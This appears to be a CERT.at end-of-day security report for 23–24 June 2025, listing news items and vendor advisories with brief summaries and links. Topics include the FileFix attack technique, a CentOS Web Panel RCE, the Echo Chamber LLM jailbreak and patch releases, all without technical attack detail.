End-of-Day report
Timeframe: Montag 23-06-2025 18:00 - Dienstag 24-06-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
News
Auswirkungen des militärischen Konfliktes zwischen Israel und dem Iran auf Österreich
Vorliegende Analysen internationaler Behörden und Sicherheitsunternehmen verzeichnen seit dem Beginn der aktuellen militärischen Auseinandersetzung zwischen Israel und dem Iran verstärkte Aktivitäten von Bedrohungsakteuren aller Konfliktparteien. [..] Laut unseren bisherigen Beobachtungen gab es bisher noch keine direkten Angriffe oder Auswirkungen auf lokale Unternehmen oder Organisationen.
https://www.cert.at/de/aktuelles/2025/6/auswirkungen
FileFix attack weaponizes Windows File Explorer for stealthy commands
A cybersecurity researcher has developed FileFix, a variant of the ClickFix social engineering attack that tricks users into executing malicious commands via the File Explorer address bar in Windows.
https://www.bleepingcomputer.com/news/security/filefix-attack-weaponizes-windows-file-explorer-for-stealthy-powershell-commands/
Polizei-Handys seit Cyberangriff nicht nutzbar
Ein Angriff auf die Diensthandys der Polizei in Mecklenburg-Vorpommern könnte größere Folgen haben als angenommen. Derzeit sind die Handys nicht im Einsatz.
https://heise.de/-10456563
BSI warnt: Immer weniger Menschen nutzen 2FA und sichere Passwörter
Eine neue Untersuchung des BSI zeigt einen bedenklichen Trend. Menschen verhalten sich im Netz trotz hoher Bedrohungslage immer unvorsichtiger.
https://www.golem.de/news/bsi-warnt-immer-weniger-menschen-nutzen-2fa-und-sichere-passwoerter-2506-197389.html
Remote code execution in CentOS Web Panel - CVE-2025-48703
This exploitation scenario has been tested on versions 0.9.8.1204 and 0.9.8.1188 on Centos7 and reported to CWP developers the 13th of May 2025 as CVE-2025-48703. It allows a remote attacker who knows a valid username on a CWP instance to execute pre-authenticated arbitrary commands on the server. The vulnerability has been patched on latest version 0.9.8.1205 during June 2025.
https://fenrisk.com/rce-centos-webpanel
The State of Ransomware 2025
Explore the causes and consequences of ransomware in 2025 based on findings from a vendor-agnostic survey of 3,400 organizations hit by ransomware in the last year.
https://news.sophos.com/en-us/2025/06/24/the-state-of-ransomware-2025/
Echo Chamber Jailbreak Tricks LLMs Like OpenAI and Google into Generating Harmful Content
Cybersecurity researchers are calling attention to a new jailbreaking method called Echo Chamber that could be leveraged to trick popular large language models (LLMs) into generating undesirable responses, irrespective of the safeguards put in place.
https://thehackernews.com/2025/06/echo-chamber-jailbreak-tricks-llms-like.html
Hackers Exploit Misconfigured Docker APIs to Mine Cryptocurrency via Tor Network
Misconfigured Docker instances are the target of a campaign that employs the Tor anonymity network to stealthily mine cryptocurrency in susceptible environments.
https://thehackernews.com/2025/06/hackers-exploit-misconfigured-docker.html
A Deep Dive into a Modular Malware Family
In today-s blog post we highlighted an interesting malware family targeting various systems with diverse capabilities, including stealing credit card information and WordPress credentials. Additionally, we detailed a novel bundle of credit card skimmers and malicious WordPress plugins which combines malicious actions with features developed for the attacker-s convenience.
https://www.wordfence.com/blog/2025/06/a-deep-dive-into-a-modular-malware-family/
Vulnerabilities
Splunk Security Advisories 2025-06-23
Splunk released 4 security advisories (1x critical).
https://advisory.splunk.com//advisories
Security updates for Tuesday
Security updates have been issued by Debian (dns-root-data and xorg-server), Fedora (glibc, mingw-glib2, and optipng), Red Hat (iputils, kernel, kernel-rt, krb5, libarchive, mod_auth_openidc, mod_proxy_cluster, and xorg-x11-server-Xwayland), SUSE (python313), and Ubuntu (fig2dev, gnuplot, gss-ntlmssp, linux, linux-gcp, linux-gke, linux-gkeop, linux-ibm, linux-kvm, linux-lowlatency, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-igx, linux-oracle, linux-aws-5.15, linux-gcp-5.15, linux-ibm-5.15, linux-lowlatency-hwe-5.15, linux-oracle-5.15, linux-aws-fips, linux-fips, linux-gcp-fips, linux-hwe-5.15, and linux-intel-iot-realtime, linux-realtime).
https://lwn.net/Articles/1026646/
Kanboard: Sicherheitslücke ermöglicht Kontoübernahme
In dem Open-Source-Kanban Kanboard können Angreifer Links fälschen, die zur Kontoübernahme führen. [..] Die Kanboard-Entwickler stellen aktualisierte Quellen und auch Docker-Container bereit, sie verlinken sie in den Release-Notes und erörtern das Docker-Update.
https://heise.de/-10457116
Mozilla Firefox June 24, 2025
https://www.mozilla.org/en-US/security/advisories/
f5: K000151924: runc vulnerability CVE-2024-45310
https://my.f5.com/manage/s/article/K000151924
Case update: DIVD-2025-00032 - Unauthenticated Arbitrary Remote Code Execution in Pterodactyl
https://csirt.divd.nl/cases/DIVD-2025-00032/